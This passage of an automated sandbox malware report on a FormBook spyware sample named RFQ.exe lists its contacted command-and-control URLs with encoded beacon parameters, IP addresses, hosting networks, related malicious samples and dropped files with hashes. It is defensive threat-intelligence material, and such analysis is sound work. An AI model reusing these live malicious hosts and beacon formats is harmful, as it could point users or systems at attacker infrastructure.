                                                                                http://www.evoo.website/293d/?W638b4U=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGTfIU/JrlV2z9a9IQeyVbD4LqpyZAtBKJ4EaDgMR1jS91tA==&Xll=50hLc0Hhyfalse
                                                                                  		unknown
                                                                                  http://www.wukong.college/9ezc/false
                                                                                    		unknown
                                                                                    http://www.astorg-group.info/vdvc/?W638b4U=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRcKpdTLsadcBjXT18ECqhEbYKAo2NhS9FS63soq1W+eFfLA==&Xll=50hLc0Hhyfalse
                                                                                      		unknown
                                                                                      http://www.kdtzhb.top/1iqa/false
                                                                                        		unknown
                                                                                        http://www.bio-thymus.com/ezyn/?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhyfalse
                                                                                          		unknown
                                                                                          http://www.migraine-massages.pro/ym43/false
                                                                                            		unknown
                                                                                            http://www.vnxoso88.art/d26j/false
                                                                                              		unknown
                                                                                              http://www.vnxoso88.art/d26j/?W638b4U=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN1iJSRG9yUGoI2tAgRBkFBhEuTNxXB6UGYS0PM3LmZFBqDA==&Xll=50hLc0Hhyfalse
                                                                                                		unknown
                                                                                                http://www.yushaliu.online/fjsq/false
                                                                                                  		unknown
                                                                                                  http://www.yushaliu.online/fjsq/?W638b4U=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSbA/Vc9/aSgY+IqBazWG3FiJEJ5+81Lg8Vy8GcHYtnLYhkw==&Xll=50hLc0Hhyfalse
                                                                                                    		unknown
                                                                                                    http://www.astorg-group.info/vdvc/false
                                                                                                      		unknown
                                                                                                      http://www.pluribiz.life/afcr/false
                                                                                                        		unknown
                                                                                                        http://www.bio-thymus.com/ezyn/false
                                                                                                          		unknown
                                                                                                          http://www.kdtzhb.top/1iqa/?W638b4U=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQjSyqzKDi3Wbpu+VrwdU4dvabDPmYf5pusJWuBQDberj5Ig==&Xll=50hLc0Hhyfalse
                                                                                                            		unknown
                                                                                                            http://www.fiqsth.vip/0m8a/?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhyfalse
                                                                                                              		unknown
                                                                                                              http://www.marketprediction.app/ucmb/false
                                                                                                                		unknown

                                                                                                                URLs from Memory and Binaries

                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                https://duckduckgo.com/chrome_newtabnet.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.yushaliu.online/sk-logabpstatus.php?a=NlFjSUtLSnllS1JFblBWQWdKcys3ZzRjSzh6dkNqL1JnUEMzQWhnet.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://dts.gnpge.comenUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://duckduckgo.com/ac/?q=net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://whois.gandi.net/en/results?search=4nk.educationnet.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.marketprediction.appenUILRNjDql.exe, 00000006.00000002.4574678267.0000000004F25000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.gandi.net/en/domainnet.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.ecosia.org/newtab/net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://whois.gandi.net/en/results?search=astorg-group.infonet.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://ac.ecosia.org/autocomplete?q=net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.comnet.exe, 00000004.00000002.4573862454.0000000004418000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.00000000045AA000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.000000000330A000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003178000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.yushaliu.online/px.js?ch=1net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.yushaliu.online/px.js?ch=2net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  47.52.221.8
                                                                                                                                                  		www.wukong.collegeUnited States
                                                                                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                  128.65.195.180
                                                                                                                                                  		www.evoo.websiteSwitzerland
                                                                                                                                                  		29222INFOMANIAK-ASCHfalse
                                                                                                                                                  23.106.59.18
                                                                                                                                                  		ppp84k45ss7ehy8ypic5x.limelightcdn.comUnited Kingdom
                                                                                                                                                  		205544LEASEWEB-UK-LON-11GBfalse
                                                                                                                                                  199.59.243.227
                                                                                                                                                  		77980.bodis.comUnited States
                                                                                                                                                  		395082BODIS-NJUSfalse
                                                                                                                                                  217.70.184.50
                                                                                                                                                  		webredir.vip.gandi.netFrance
                                                                                                                                                  		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                                                                                                  208.91.197.27
                                                                                                                                                  		www.yushaliu.onlineVirgin Islands (BRITISH)
                                                                                                                                                  		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                  209.74.64.58
                                                                                                                                                  		www.pluribiz.lifeUnited States
                                                                                                                                                  		31744MULTIBAND-NEWHOPEUSfalse
                                                                                                                                                  3.33.130.190
                                                                                                                                                  		fiqsth.vipUnited States
                                                                                                                                                  		8987AMAZONEXPANSIONGBfalse
                                                                                                                                                  47.242.89.146
                                                                                                                                                  		www.kdtzhb.topUnited States
                                                                                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1555881
                                                                                                                                                  Start date and time:2024-11-14 15:38:08 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 24s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:2
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Sample name:RFQ.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@17/9
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 91%
                                                                                                                                                  • Number of executed functions: 52
                                                                                                                                                  • Number of non-executed functions: 293
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • VT rate limit hit for: RFQ.exe

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  09:40:02API Interceptor13180408x Sleep call for process: net.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  47.52.221.8statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.wukong.college/9ezc/
                                                                                                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.wukong.college/4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.wukong.college/9ezc/
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.wukong.college/9ezc/
                                                                                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.wukong.college/9ezc/
                                                                                                                                                  128.65.195.180statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.evoo.website/293d/
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.evoo.website/293d/
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.evoo.website/293d/
                                                                                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.evoo.website/293d/
                                                                                                                                                  TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.airbnbneuchatel.com/0zfk/
                                                                                                                                                  Inquiry Second Reminder.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
                                                                                                                                                  LPOH2401-3172(Mr.Kem Sophea)-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
                                                                                                                                                  PGiUp8uqGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
                                                                                                                                                  LGSTXJeTc4.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
                                                                                                                                                  MVEjijPB3m.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  www.pluribiz.lifestatement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 209.74.64.58
                                                                                                                                                  webredir.vip.gandi.netstatement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50
                                                                                                                                                  rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 217.70.184.50

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  INFOMANIAK-ASCHstatement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 128.65.195.180
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 128.65.195.180
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 128.65.195.180
                                                                                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 128.65.195.180
                                                                                                                                                  https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                                                                                  • 128.65.195.91
                                                                                                                                                  https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                                                                                  • 128.65.195.91
                                                                                                                                                  z95ordemdecomprapdfx4672xx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 84.16.66.164
                                                                                                                                                  Doc.exeGet hashmaliciousSliverBrowse
                                                                                                                                                  • 128.65.199.135
                                                                                                                                                  Nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 84.16.66.164
                                                                                                                                                  TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 128.65.195.180
                                                                                                                                                  BODIS-NJUSPO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                  • 199.59.243.227
                                                                                                                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCyakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 47.244.187.149
                                                                                                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                  • 8.212.195.111
                                                                                                                                                  http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 47.253.61.56
                                                                                                                                                  statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 47.242.89.146
                                                                                                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 47.52.221.8
                                                                                                                                                  inter.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 8.210.59.12
                                                                                                                                                  inter.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 8.210.59.12
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 47.242.89.146
                                                                                                                                                  https://gerneva.comGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 47.251.24.229
                                                                                                                                                  sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 147.139.148.16
                                                                                                                                                  LEASEWEB-UK-LON-11GBstatement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 23.106.59.18
                                                                                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 23.106.59.18
                                                                                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 23.106.59.18
                                                                                                                                                  SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.106.59.52
                                                                                                                                                  SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 95.168.183.162
                                                                                                                                                  SecuriteInfo.com.FileRepMalware.15071.2577.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.106.59.18
                                                                                                                                                  5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.106.59.52
                                                                                                                                                  F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.106.59.52
                                                                                                                                                  d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.106.59.52
                                                                                                                                                  d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.106.59.52

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\F14431U2a

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\SysWOW64\net.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):196608
                                                                                                                                                  Entropy (8bit):1.121297215059106
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\autE5C3.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\RFQ.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):288768
                                                                                                                                                  Entropy (8bit):7.995173941472522
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:6144:O2V/PcU70wKG+Btq37WYC2JBCF5CdRlaLKZi0Sz9eIUSQHsoJGm3aGQa8nU:dBPxuI33CSmw8LyJSzWSdoJR3aRW
                                                                                                                                                  MD5:EA7E1B5B5094BB0870299EFC336B0042
                                                                                                                                                  SHA1:A4C3FA5FB9CB08D44BD5DB230B233F3E00F5EF00
                                                                                                                                                  SHA-256:E32F7A5BD208F355D124CD8568F411DF77A65E29405A10405942350F36862092
                                                                                                                                                  SHA-512:956545A1975B353C157A6BA7C6CEB97A0D69B5CDDA885891B75ADE7C5A5D256B5102CFF169C54D58112445FDD64FF8F5DBD9C8BDCCC9C8FEEA44B7B364C1A1F6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:...e.SBPO...A....UW..aUB..BPOR54HDCKVCGUTQRAIVJ7QSBPOR54.DCKX\.[T.[.h.K{.r.8&!.D:+$97.g65?<.=v(Rq!7>o;[....k;,#0z\_KmVJ7QSBP6S<.u$$.k# .i15.S...k3%.U...t$$.L..h15..?)_l3%.OR54HDCK..GU.PSA@.GjQSBPOR54.DAJ]BLUT.VAIVJ7QSBP.F54HTCKV3CUTQ.AIFJ7QQBPIR54HDCKPCGUTQRAI&N7QQBPOR54JD..VCWUTARAIVZ7QCBPOR54XDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAg"/O%SBPk.14HTCKV.CUTARAIVJ7QSBPOR54hDC+VCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCK

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\prespecialist

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\RFQ.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):288768
                                                                                                                                                  Entropy (8bit):7.995173941472522
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:6144:O2V/PcU70wKG+Btq37WYC2JBCF5CdRlaLKZi0Sz9eIUSQHsoJGm3aGQa8nU:dBPxuI33CSmw8LyJSzWSdoJR3aRW
                                                                                                                                                  MD5:EA7E1B5B5094BB0870299EFC336B0042
                                                                                                                                                  SHA1:A4C3FA5FB9CB08D44BD5DB230B233F3E00F5EF00
                                                                                                                                                  SHA-256:E32F7A5BD208F355D124CD8568F411DF77A65E29405A10405942350F36862092
                                                                                                                                                  SHA-512:956545A1975B353C157A6BA7C6CEB97A0D69B5CDDA885891B75ADE7C5A5D256B5102CFF169C54D58112445FDD64FF8F5DBD9C8BDCCC9C8FEEA44B7B364C1A1F6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
